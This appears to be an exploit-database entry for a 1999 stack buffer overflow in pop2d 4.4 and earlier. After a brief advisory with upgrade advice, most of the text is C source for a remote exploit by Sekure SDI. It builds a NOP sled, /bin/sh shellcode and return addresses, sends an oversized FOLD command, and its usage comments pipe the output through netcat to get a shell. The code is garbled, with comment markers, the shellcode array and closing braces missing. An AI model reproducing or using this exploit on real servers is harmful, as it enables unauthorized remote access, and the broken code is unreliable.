c0nd0r <condor@sekure.org>
Buffer Overflow
Product Name: pop2d
Affected Version From: 4.4 or earlier
Patch Exists: NO
CPE: a:pop2d:pop2d:4.4
Platforms Tested: Linux

Buffer Overflow Vulnerability in pop2d

A buffer overflow vulnerability in pop2d version 4.4 or earlier allows malicious remote users to obtain access to the "nobody" user account. Once logged on, issuing a FOLD command with an argument of about 1000 bytes will cause a stack-based buffer overflow.


Upgrade to a version of pop2d later than 4.4.

// source: https://www.securityfocus.com/bid/283/info

 * Sekure SDI (Brazilian Information Security Team)
 * ipop2d remote exploit for linux (Jun, 02 1999)
 * by c0nd0r <condor@sekure.org>
 *  (read the instructions below)
 *  Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr,
 *            falcon, vader, c_orb, marty(nordo!) and minha malinha!
 *            also to #uground (irc.brasnet.org) and #SDI (efnet),
 *            guys at el8.org, toxyn.org, pulhas.org
 *  Sincere Apologizes: duke (for the mistake we made with the wu-expl),
 *                     your code rocks.
 *  Usage:
 *    SDI-pop2 <imap_server> <user> <pass> [offset]
 *   where  imap_server = IMAP server at your box (or other place as well)
 *          user = any account at your box
 *          pass = the account's password
 *          offset = 0 is default -- increase if it's necessary.
 *  Example: (netcat rocks)
 *  (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109
 *  ----------------------------------------------------------------
 *  HOWTO-exploit:
 *   In order to gain remote access as user nobody, you should set
 *   an IMAP server at your box (just edit the inetd.conf) or at
 *   any other machine which you have an account.
 *   During the anonymous_login() function, the ipop2d will set the
 *   uid to user nobody, so you are not going to get a rootshell.
 *  ----------------------------------------------------------------
 *  We do NOT take any responsability for the consequences of using
 *  this code -- you've been warned! don't be a script k1dd13!

#include <stdio.h>

 *  (shellcode)
 *       jmp   0x1f
 *       popl  %esi
 *       movl  %esi,0x8(%esi)
 *       xorl  %eax,%eax
 *       movb  %eax,0x7(%esi)
 *       movl  %eax,0xc(%esi)
 *       movb  $0xb,%al
 *       movl  %esi,%ebx
 *       leal  0x8(%esi),%ecx
 *       leal  0xc(%esi),%edx
 *       int   $0x80
 *       xorl  %ebx,%ebx
 *       movl  %ebx,%eax
 *       inc   %eax
 *       int   $0x80
 *       call  -0x24
 *       .string \"/bin/sh\"
 * grab your shellcode generator at www.sekure.org

char c0d3[] =

main (int argc, char *argv[] ) {
 char buf[2500];
 int x,y=1000, offset=0;
 long addr;
 char host[255], user[255], pass[255];
 int bsize=986;
 if ( argc < 4) {
  printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n");
  printf ( "usage:
(SDI-pop2 <imap server> <user> <pass> [offset];cat) | nc lame.org 109\n");
  exit (0);
 snprintf ( host, sizeof(host), "%s", argv[1]);
 snprintf ( user, sizeof(user), "%s", argv[2]);
 snprintf ( pass, sizeof(pass), "%s", argv[3]);
 if ( argc > 4) offset = atoi ( argv[4]);
 /* gimme the ret + offset */
 addr = 0xbffff3c0 + offset; 
 fprintf ( stderr, "0wning data since 0x%x\n\n", addr);
 /* calculation of the return address position */
 bsize -= strlen ( host);
 for ( x = 0; x < bsize-strlen(c0d3); x++)
  buf[x] = 0x90;
 for ( y = 0; y < strlen(c0d3); x++, y++)
  buf[x] = c0d3[y]; 
 for (  ; x < 1012; x+=4) { 
  buf[x  ] = addr & 0x000000ff;
  buf[x+1] = (addr & 0x0000ff00) >> 8;
  buf[x+2] = (addr & 0x00ff0000) >> 16;
  buf[x+3] = (addr & 0xff000000) >> 24;
 sleep (1);
 printf ( "HELO %s:%s %s\r\n", host, user, pass);
 sleep (1);
 printf ( "FOLD %s\r\n", buf);
